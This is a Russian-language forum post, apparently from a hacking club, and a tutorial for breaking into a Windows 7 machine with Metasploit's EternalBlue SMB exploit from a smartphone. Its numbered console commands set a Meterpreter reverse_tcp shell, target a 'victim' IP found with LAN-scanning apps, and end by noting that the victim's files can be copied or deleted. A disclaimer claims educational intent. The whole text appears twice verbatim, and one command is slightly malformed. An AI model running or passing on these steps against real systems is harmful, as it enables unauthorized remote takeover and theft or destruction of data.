Download_Link
Участник клуба
Взламывать с помощью metasploit можно не только ПК, но и Android устройства. Но сегодня мы рассмотрим пока что только ПК.
Материал предоставлен исключительно в ознакомительных целях и не является призывом к действиям, носит образовательный и предупредительный характер. Ни автор материала, ни создатель программного обеспечения не побуждает повторять увиденное. Все действующие лица являются вымышленными, а сходство с реальными лицами и событиями может оказаться лишь случайным и ненамеренным
.
Взламывать мы будем мою виртуальную машину с Windows 7. Устройством взлома будет служить мой смартфон.
1) Запускаем metasploit командой:
msfconsole
2)Ждем, когда запустится программа и в ней прописываем:
use exploit/windows/smb/ms17_010_eternalblue
Этой командой мы выбираем эксплойт: eternalblue
3) Далее выбираем процесс, который мы будем внедрять в систему. Если у жертвы стоит 32-битная система, то прописываем команду:
set process inject wlms.exe
Если на компьютере жертвы стоит 64-битная ОС:
set process inject lsass.exe
4) Следующей командой мы выбираем, что будем управлять компьютером с помощью reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
5) Этой командой мы прописываем IP жертвы:
set rhost 192.168...
Если вы с "жертвой" находитесь в одной локальной сети, можете скачать на свой смартфон программу (например, Fing, zAnti или wifi kill, хотя предназначение последней немного другое), которая сканирует сеть и показывает MAC-адреса и IP всех устройств в локальной сети.
6) Этой командой прописываем свой IP (устройства с которого атакуете):
set lhost 192.168...
Узнать свой IP можно, если в Termux прописать команду: ifconfig
7) Прописываем команду
exploit
И ждем. Как только запустится сессия meterpreter, всё - взлом прошел успешно.
8) Теперь, вы можете делать в компьютере "жертвы" все, что захотите. Ваши возможности ограничиваются лишь вашей фантазией.
Можно скопировать файлы "жертвы", удалить их, посмотреть конфигурацию компьютера и т.д. Пропишите команду help, чтобы посмотреть все доступные команды.
Материал предоставлен исключительно в ознакомительных целях и не является призывом к действиям, носит образовательный и предупредительный характер. Ни автор материала, ни создатель программного обеспечения не побуждает повторять увиденное. Все действующие лица являются вымышленными, а сходство с реальными лицами и событиями может оказаться лишь случайным и ненамеренным
.
Взламывать мы будем мою виртуальную машину с Windows 7. Устройством взлома будет служить мой смартфон.
1) Запускаем metasploit командой:
msfconsole
2)Ждем, когда запустится программа и в ней прописываем:
use exploit/windows/smb/ms17_010_eternalblue
Этой командой мы выбираем эксплойт: eternalblue
3) Далее выбираем процесс, который мы будем внедрять в систему. Если у жертвы стоит 32-битная система, то прописываем команду:
set process inject wlms.exe
Если на компьютере жертвы стоит 64-битная ОС:
set process inject lsass.exe
4) Следующей командой мы выбираем, что будем управлять компьютером с помощью reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
5) Этой командой мы прописываем IP жертвы:
set rhost 192.168...
Если вы с "жертвой" находитесь в одной локальной сети, можете скачать на свой смартфон программу (например, Fing, zAnti или wifi kill, хотя предназначение последней немного другое), которая сканирует сеть и показывает MAC-адреса и IP всех устройств в локальной сети.
6) Этой командой прописываем свой IP (устройства с которого атакуете):
set lhost 192.168...
Узнать свой IP можно, если в Termux прописать команду: ifconfig
7) Прописываем команду
exploit
И ждем. Как только запустится сессия meterpreter, всё - взлом прошел успешно.
8) Теперь, вы можете делать в компьютере "жертвы" все, что захотите. Ваши возможности ограничиваются лишь вашей фантазией.
Можно скопировать файлы "жертвы", удалить их, посмотреть конфигурацию компьютера и т.д. Пропишите команду help, чтобы посмотреть все доступные команды.
